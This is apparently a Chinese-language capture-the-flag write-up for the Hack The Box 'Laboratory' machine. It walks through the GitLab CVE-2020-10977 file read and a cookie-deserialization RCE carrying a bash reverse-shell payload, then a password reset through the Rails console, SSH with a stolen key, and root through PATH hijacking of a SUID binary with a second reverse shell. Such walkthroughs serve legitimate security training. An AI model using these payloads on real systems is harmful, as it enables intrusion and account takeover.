laboratory
#0 Nmap 收集信息
nmap 10.10.10.26 -p-
根据Nmap的综合扫描来看,有两个域名laboratory.htb和git.laboratory.htb。
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p-
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:34 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0054s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
443/tcp open https
Nmap done: 1 IP address (1 host up) scanned in 104.39 seconds
─[sg-vip-1]─[10.10.14.33]─[htb-ch1r0n@htb-3c7dulytfv]─[~]
└──╼ [★]$ nmap 10.10.10.216 -p22,80,443 -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-16 02:38 UTC
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.0026s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after: 2024-03-03T10:39:28
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.08 seconds
在laboratory.htb翻找一番并未发现有利用的东西。常规操作扫目录、查看页面信息都没收获。
唯一有价值就是三个“用户名”
#1 漏洞利用 CVE-2020-10977(LFI)
接着就是到git.laboratory.htb,打开发现是gitlab服务
到attackerkb上搜索公开漏洞,发现有个LFI-RCE,漏洞编号CVE-2020-10977;
注册账号后根据漏洞复现文章进行漏洞复现,创建两个Projects
参考:https://www.freesion.com/article/17771419587/
再其中一个issues中加入payload
移动到另外一个Projects中
成功获得目标机器的secrets.yml,获取secret_key_base
攻击机上安装gitlab,安装步骤可按照上面的参考。
安装完依次输入两条命令启动gitlab。(需要些时间)gitlab-ctl reconfiguregitlab-ctl restart
将secrets.yml替换到攻击机的/opt/gitlab/embedded/service/gitlab-rails/config/secrets.ymlsudo cp secrets.yml /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
#2 漏洞利用 CVE-2020-10977(RCE)
替换完后启动gitlab-rails console
执行以下命令,主要修改ip和port
request = ActionDispatch::Request.new(Rails.application.env_config)
request.env["action_dispatch.cookies_serializer"] = :marshal
cookies = request.cookie_jar
erb = ERB.new("<%= `bash -c 'bash -i >&/dev/tcp/10.10.14.33/8888 0>&1'` %>")
depr = ActiveSupport::Deprecation::DeprecatedInstanceVariableProxy.new(erb, :result, "@result", ActiveSupport::Deprecation.new)
cookies.signed[:cookie] = depr
puts cookies[:cookie]
获得cookie后将cookie复制到curl中
curl -vvv 'https://git.laboratory.htb/users/sign_in' -b "experimentation_subject_id=BAhvOkBBY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbjo6RGVwcmVjYXRlZEluc3RhbmNlVmFyaWFibGVQcm94eQk6DkBpbnN0YW5jZW86CEVSQgs6EEBzYWZlX2xldmVsMDoJQHNyY0kiYCNjb2Rpbmc6VVRGLTgKX2VyYm91dCA9ICsnJzsgX2VyYm91dC48PCgoIGBlY2hvIGZsYWcgd2FzIGhlcmUgPiAvdG1wL2ZsYWdgICkudG9fcyk7IF9lcmJvdXQGOgZFRjoOQGVuY29kaW5nSXU6DUVuY29kaW5nClVURi04BjsKRjoTQGZyb3plbl9zdHJpbmcwOg5AZmlsZW5hbWUwOgxAbGluZW5vaQA6DEBtZXRob2Q6C3Jlc3VsdDoJQHZhckkiDEByZXN1bHQGOwpUOhBAZGVwcmVjYXRvckl1Oh9BY3RpdmVTdXBwb3J0OjpEZXByZWNhdGlvbgAGOwpU--cb4149c7d5749262ab9d2f2072628501ab59ef9b" -k
攻击机起监听后,发送curl请求,将shell弹回到攻击机上
#3 USER Flag
接着在攻击机上启用gitlab-rails console
寻找其他用户
user = User.find(1)
user.password = 'password1'
user.password_confirmation = 'password1'
user.save
找到dexter用户,他是公司的CEO。
结果显示为true表示修改成功。
gitlab登录到该用户找下是否有可利用的线索。
找到一个id_rsa私钥直接将私钥复制下来。
利用私钥进行登录,权限要设置成600chmod 600 id_rsa
成功获得user的flag
#4 ROOT Flag
查看有SUID权限的文件find -perm -4000 2>/dev/null
这里有个docker-security 比较可疑,直接查看一下,隐约能看到执行了两次chmod命令
我们可以使用环境变量提权
参考:https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/
创建个chmod,修改环境变量。
dexter@laboratory:~$ nano /tmp/chmod
dexter@laboratory:~$ cat /tmp/chmod
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.33/33333 0>&1
dexter@laboratory:~$ chmod +x /tmp/chmod
dexter@laboratory:~$ PATH=/tmp:$PATH docker-security
攻击机开启监听,成功弹回shell。获得root flag
收工!
参考链接: